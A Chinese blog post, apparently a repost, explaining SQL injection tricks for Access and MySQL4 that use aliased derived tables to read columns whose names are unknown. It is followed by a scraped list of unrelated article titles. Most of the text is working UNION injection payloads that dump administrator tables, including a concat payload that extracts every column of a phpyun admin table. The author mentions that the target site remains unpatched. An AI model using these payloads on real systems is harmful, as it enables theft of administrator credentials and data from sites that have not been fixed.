技巧使用时间:知道“表名”但是猜不到“列名”的时候

前几天看了文章:http://www.91ri.org/11120.html,这里提到了access的注入小技巧,如果看懂了~大家就忽略前半篇吧~~
然后今天想想,mysql4是没有information_schema的,也就是说表名和列名和access一样,要靠猜,那么~~这个技巧或许可以用上

ACCESS篇:
不知道大家还记得http://sb.f4ck.org/thread-6017-1-1.html 这篇文章么? access偏移注入,对的这里有个前提,想要注入的表(一般是管理员表)比当前表(比如文章表)select的字段要少

但是,如果使用了今天说的这个小技巧,就可以无视这个限制~~~

前提还是一样的,需要知道表名~~比如这里是admin~~(PS:我也不知道怎么这么久了他还是不补注入漏洞。。。)

首先,我们之前注入时候就知道这里有8列,因此直接构造如下语句:

  1. x.asp?id=90 union select 1,2,3,4,5,6,7,8 from(select * from admin order by 1)

复制代码

我们来分解下:

  1. union select 1,2,3,4,5,6,7,8 是匹配前面的列数
  2. from(x)是使用派生表~~
  3. select * from admin order by 1 是构造派生表

复制代码

这里我们看下order by 5:

很明显,不再显示列了,说明没有5列,我们之前文章中也说了,admin只有4列
于是我们构造:

  1. x.asp?id=90 union select 1,2,3,4,5,6,7,8 from(select 1 as a_1,2 as a_2,3 as a_3,4 as a_4 from admin where 1=2 union select * from admin)

复制代码

还是分解下:

  1. union select 1,2,3,4,5,6,7,8 是匹配前面的列数
  2. select 1 as a_1,2 as a_2,3 as a_3,4 as a_4 是将每一列做了别名,用途是之后可以用别名来引用我们不知道的列名
  3. where 1=2 目的是将前面的别名条件用假,从而显示后面的union select的内容
  4. union select * from admin 联合查询,得到真正需要的admin表所有列内容

复制代码

接下来就要用到我们的别名了:
这里撸主没有测试成功文章中所说的”

field_1&'|'&field_2&'|'&field_3&'|'&field_4&'|'&field_5

“方法,只能直接使用别名,可能是撸主的access太烂了吧……
于是:

  1. .asp?id=-90 union select 1,a_4
  2. ,a_3,4,5,6,7,8 from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4 from admin where 1=2 union select * from admin)

复制代码

这里其实就是将a_4,a_3显示出来而已,至于为什么是a_4,a_3,这就是一次次试验出来的……下次可能就是a_1,a_2

==================================================================================

MYSQL篇:

再来说说mysql,由于mysql4是没有information_schema的,因此或许可能会用到吧~
就拿php_yun做演示吧:

我们随便select两个字段:

  1. SELECT id,name FROM `phpyun_description`where id = 1 union select 1,2 from (select * from phpyun_admin_user order by 1)a

复制代码

这里注意与access不一样的地方,mysql不会自动给派生表定义别名,因此我们需要在最后加一个a,或者as a
不然会出什么问题,读者可以自己试试~~~

然后我们需要猜phpyun_admin_user的列数

  1. SELECT id,name FROM `phpyun_description`where id = 1 union select 1,2 from (select * from phpyun_admin_user order by 6)a

复制代码

猜出来是6列

之后我们构造“利用别名列查询出所有字段的子语句”:

  1. select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from phpyun_admin_user where 1=2 union select * from phpyun_admin_user

复制代码

最后我们将其拼接起来:

  1. SELECT id,name FROM `phpyun_description`where id = 1 and 1=2 union select a_3,a_4 from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from phpyun_admin_user where 1=2 union select * from phpyun_admin_user)a

复制代码

恩,既然是mysql,就可以一起显示啦~~利用concat,就不需要一个个测试到底是那一列了

  1. SELECT id,name FROM `phpyun_description`where id = 1 and 1=2 union select 1,concat(a_1,0x23,a_2,0x23,a_3,0x23,a_4,0x23,a_5,0x23,a_6) from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from phpyun_admin_user where 1=2 union select * from phpyun_admin_user)a

复制代码

转载于:https://www.cnblogs.com/mujj/articles/4084959.html

access和mysql4注入小技巧相关推荐

  1. php 预处理 防注入,PHP防止sql注入小技巧之sql预处理原理与实现方法分析

    本文实例讲述了PHP防止sql注入小技巧之sql预处理原理与实现方法.分享给大家供大家参考,具体如下: 我们可以把sql预处理看作是想要运行的 SQL 的一种编译过的模板,它可以使用变量参数进行定制. ...

  2. 禅道826版本SQL注入,登录绕过以及禅道826后台GetShell的小技巧

    SQL注入由 orderBy($order) 函数过滤不严格导致.但是,这个函数对传进的参数进行了一系列过滤,导致 getshell 的条件比较苛刻.不甘心,于是乎找了一个比较好利用的地方.我只是以这 ...

  3. sql注入联合查询小技巧绕过验证

    来源为一道ctf题目 <!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ ...

  4. iOS必备小技巧(非常的全)

    IOS必备小技巧 退回输入键盘   - (BOOL)textFieldShouldReturn:(id)textField{     [textField resignFirstResponder]; ...

  5. 吐血整理!14个编写Spring MVC控制器的实用小技巧

    全文共4248字,预计学习时长9分钟 编写Spring MVC控制器的最佳技巧 本文介绍了编写Spring MVC框架的控制器(controller)的基础技巧和最佳操作.在Spring MVC框架中 ...

  6. 全栈工程师15年经验分享:40个改变编程技能的小技巧

    白交 发自 凹非寺  量子位 报道 | 公众号 QbitAI 编程如何节省更多的时间,犯更少的错误? 最近,这样一份「心得」火了.这位名叫Kesk Noren的软件工程师在Medium上分享了一篇博文 ...

  7. 15年经验分享:40个改变编程技能的小技巧

    点击上方"小白学视觉",选择加"星标"或"置顶" 重磅干货,第一时间送达 本文转自|机器学习算法那些事 编程如何节省更多的时间,犯更少的错误 ...

  8. Android 之小技巧

    小技巧,不足为专题内容 TextView的drawableLeft与文本一起居中显示 原始的TextView设置了LeftDrawable后,如果TextView的宽度是MATCH_PARENT,Le ...

  9. laravel模板写php代码,Laravel框架之blade模板新手入门教程及小技巧

    简介 Blade 是 Laravel 所提供的一个简单且强大的模板引擎.相较于其它知名的 PHP 模板引擎,Blade 并不会限制你必须得在视图中使用 PHP 代码.所有 Blade 视图都会被编译缓 ...

最新文章

  1. 大数据谋定农业发展路径-丰收节贸易会:全球十大经典案例
  2. 路由(route)是什么意思?
  3. Maven pom.xml配置详解(三)
  4. MIT开源高性能自动微分框架Enzyme:速度提升4.5倍
  5. 视频容器格式与编码格式简介
  6. 哈希运算python实现_一致性哈希算法 python实现
  7. 【C语言简单说】十五:while循环
  8. 计算机刚开机时执行的是,电脑刚开机就提示自动关机该怎么办
  9. 对数据库设计的一点感想
  10. 面试题 31 : 栈的压入、弹出序列
  11. 如何理解什么是放射?
  12. RSA的JavaScript程序
  13. 对称二叉树c++_二叉树:我对称么?
  14. 刷吉米多维奇系列小结(一)
  15. c语言入门自学 零基础学c语言教程
  16. 将caj转换成pdf
  17. 解决ubuntu 18.04平台上thinkpad小红点TrackPoint左键随机失效的问题(by quqi99)
  18. 在WINDOWS 10上SQL SERVER如何远程调试防火墙
  19. 妹子读者小墨:一文和你聊透数据可视化!
  20. 【JQuery】关于jQuery的load方法在Laravel里的使用

热门文章

  1. Modifier ‘public‘ is redundant for interface methods错误
  2. maya如何导出ue4_ue4 maya max导入导出问题
  3. php对键盘控制,键盘控制 - 陈映亮的个人空间 - OSCHINA - 中文开源技术交流社区...
  4. java php cms_内容管理系统的开发策略研究——以PHP CMS、Node.js CMS、Java CMS为例
  5. jq点击事件多次响应_分享同一个按钮jQuery多次点击实现不同事件的代码
  6. STM32F103单片机ADC功能使用
  7. 宅在家里写数据库中函数应用
  8. Java中File操作
  9. mysql压缩包版安装
  10. BZOJ 2436 Noi嘉年华(优化DP)